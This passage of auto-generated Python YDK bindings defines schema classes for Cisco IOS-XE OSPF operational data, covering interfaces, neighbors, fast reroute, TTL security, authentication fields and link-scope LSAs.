(YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('priority', (YLeaf(YType.uint8, 'priority'), ['int'])), ]) self.name = None self.network_type = None self.passive = None self.demand_circuit = None self.node_flag = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.mtu_ignore = None self.lls = None self.prefix_suppression = None self.bfd = None self.enable = None self.state = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.priority = None self.multi_area = 
OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea() self.multi_area.parent = self self._children_name_map["multi_area"] = "multi-area" self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute() self.fast_reroute.parent = self self._children_name_map["fast_reroute"] = "fast-reroute" self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity() self.ttl_security.parent = self self._children_name_map["ttl_security"] = "ttl-security" self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication() self.authentication.parent = self self._children_name_map["authentication"] = "authentication" self.static_neighbor = YList(self) self.ospf_neighbor = YList(self) self.intf_link_scope_lsas = YList(self) self.intf_multi_topology = YList(self) self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value) class MultiArea(Entity): """ Multi Area .. attribute:: multi_area_id Multi\-area ID **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: cost Interface cost for multi\-area **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__() self.yang_name = "multi-area" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ]) self.multi_area_id = None self.cost = None self._segment_path = lambda: "multi-area" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value) class StaticNeighbor(Entity): """ Staticly configured neighbors .. attribute:: address (key) Neighbor IP address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: cost Neighbor cost **type**\: int **range:** 0..65535 **config**\: False .. 
attribute:: poll_interval Neighbor polling intervali in seconds **type**\: int **range:** 0..65535 **config**\: False **units**\: seconds """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__() self.yang_name = "static-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['address'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])), ]) self.address = None self.cost = None self.poll_interval = None self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value) class FastReroute(Entity): """ Fast reroute config .. attribute:: candidate_disabled Prevent the interface to be used as backup **type**\: bool **config**\: False .. attribute:: enabled Activates LFA. This model assumes activation of per\-prefix LFA **type**\: bool **config**\: False .. 
                        attribute:: remote_lfa_enabled

                            Activates remote LFA

                            **type**\: bool

                            **config**\: False

                        """

                        # Generated ydk metadata: YANG module prefix and revision this
                        # binding was produced from (Cisco-IOS-XE-ospf-oper).
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'

                        def __init__(self):
                            # Register the 'fast-reroute' container's YANG metadata with
                            # the ydk Entity base class.
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__()

                            self.yang_name = "fast-reroute"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            # Three boolean leafs controlling LFA behaviour on this interface.
                            self._leafs = OrderedDict([
                                ('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])),
                                ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
                                ('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])),
                            ])
                            self.candidate_disabled = None
                            self.enabled = None
                            self.remote_lfa_enabled = None
                            self._segment_path = lambda: "fast-reroute"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            # Route attribute writes through ydk so only the declared
                            # leaf names are accepted once the instance is frozen.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value)


                    class TtlSecurity(Entity):
                        """
                        TTL security

                        .. attribute:: enabled

                            Enable/Disable TTL security check

                            **type**\: bool

                            **config**\: False

                        ..
                        attribute:: hops

                            Maximum number of hops that a OSPF packet may have traveled

                            **type**\: int

                            **range:** 0..255

                            **config**\: False

                        """

                        # Generated ydk metadata: YANG module prefix and revision.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'

                        def __init__(self):
                            # Register the 'ttl-security' container's YANG metadata with
                            # the ydk Entity base class.
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__()

                            self.yang_name = "ttl-security"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            # 'enabled' toggles the TTL check; 'hops' is the uint8 hop limit.
                            self._leafs = OrderedDict([
                                ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
                                ('hops', (YLeaf(YType.uint8, 'hops'), ['int'])),
                            ])
                            self.enabled = None
                            self.hops = None
                            self._segment_path = lambda: "ttl-security"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            # Route attribute writes through ydk's setattr validation.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value)


                    class Authentication(Entity):
                        """
                        Authentication configuration

                        .. attribute:: sa

                            SA name

                            **type**\: str

                            **config**\: False

                        .. attribute:: key_chain

                            key\-chain name

                            **type**\: str

                            **config**\: False

                        .. attribute:: key_string

                            Key string in ASCII format

                            **type**\: str

                            **config**\: False

                        .. attribute:: crypto_algorithm_val

                            Crypto algorithm

                            **type**\: :py:class:`CryptoAlgorithmVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal>`

                            **config**\: False

                        ..
attribute:: no_auth No authentication enabled **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__() self.yang_name = "authentication" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))]) self._leafs = OrderedDict([ ('sa', (YLeaf(YType.str, 'sa'), ['str'])), ('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])), ('key_string', (YLeaf(YType.str, 'key-string'), ['str'])), ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.sa = None self.key_chain = None self.key_string = None self.no_auth = None self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal() self.crypto_algorithm_val.parent = self self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val" self._segment_path = lambda: "authentication" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value) class CryptoAlgorithmVal(Entity): """ Crypto algorithm .. attribute:: hmac_sha1_12 HMAC\-SHA1\-12 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha1_20 HMAC\-SHA1\-20 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: md5 MD5 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: sha_1 SHA\-1 algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. 
attribute:: hmac_sha_1 HMAC\-SHA\-1 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_256 HMAC\-SHA\-256 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_384 HMAC\-SHA\-384 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False .. attribute:: hmac_sha_512 HMAC\-SHA\-512 authentication algorithm **type**\: :py:class:`Empty<ydk.types.Empty>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__() self.yang_name = "crypto-algorithm-val" self.yang_parent_name = "authentication" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])), ('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])), ('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])), ('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])), ('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])), ('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])), ('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])), ('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])), ]) self.hmac_sha1_12 = None self.hmac_sha1_20 = None self.md5 = None self.sha_1 = None self.hmac_sha_1 = None self.hmac_sha_256 = None self.hmac_sha_384 = None self.hmac_sha_512 = None self._segment_path = lambda: "crypto-algorithm-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value) class 
OspfNeighbor(Entity): """ List of OSPF neighbors .. attribute:: neighbor_id (key) OSPF neighbor ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: address Neighbor address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: dr Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr Backup Designated Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: state OSPF neighbor state **type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>` **config**\: False .. attribute:: stats Per\-neighbor statistics **type**\: :py:class:`Stats <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__() self.yang_name = "ospf-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['neighbor_id'] self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))]) self._leafs = OrderedDict([ ('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ]) self.neighbor_id = None self.address = None self.dr = None self.bdr = None self.state = None self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats() self.stats.parent = self self._children_name_map["stats"] = "stats" self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']" self._is_frozen = True def __setattr__(self, name, value): 
                            # Continuation of OspfNeighbor.__setattr__: route attribute
                            # writes through ydk's setattr validation for the listed leafs.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value)


                        class Stats(Entity):
                            """
                            Per\-neighbor statistics

                            .. attribute:: nbr_event_count

                                The number of time this neighbor has changed state or an error has occurred

                                **type**\: int

                                **range:** 0..4294967295

                                **config**\: False

                            .. attribute:: nbr_retrans_qlen

                                The current length of the retransmission queue

                                **type**\: int

                                **range:** 0..4294967295

                                **config**\: False

                            """

                            # Generated ydk metadata: YANG module prefix and revision.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'

                            def __init__(self):
                                # Register the 'stats' container's YANG metadata with the
                                # ydk Entity base class.
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__()

                                self.yang_name = "stats"
                                self.yang_parent_name = "ospf-neighbor"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([])
                                # Two uint32 counters describing neighbor churn and queue depth.
                                self._leafs = OrderedDict([
                                    ('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])),
                                    ('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])),
                                ])
                                self.nbr_event_count = None
                                self.nbr_retrans_qlen = None
                                self._segment_path = lambda: "stats"
                                self._is_frozen = True

                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value)


                    class IntfLinkScopeLsas(Entity):
                        """
                        List OSPF link scope LSAs

                        .. attribute:: lsa_type  (key)

                            OSPF link scope LSA type

                            **type**\: int

                            **range:** 0..4294967295

                            **config**\: False

                        .. attribute:: link_scope_lsa

                            List of OSPF link scope LSAs

                            **type**\: list of  :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa>`

                            **config**\: False

                        ..
attribute:: area_scope_lsa List OSPF area scope LSA databases **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__() self.yang_name = "intf-link-scope-lsas" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): """ List of OSPF link scope LSAs .. attribute:: lsa_id (key) LSA ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: version Version **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link OSPFv2 LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv2_unknown_tlv OSPFv2 Unknown TLV **type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>` **config**\: False .. 
attribute:: ospfv3_lsa_val OSPFv3 LSA **type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix_list OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>` **config**\: False .. attribute:: multi_topology OSPF multi\-topology interface augmentation **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology>` **config**\: False .. attribute:: router_address Router address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: tlv Link TLV **type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv>` **config**\: False .. attribute:: unknown_sub_tlv OSPFv2 Unknown sub TLV **type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", 
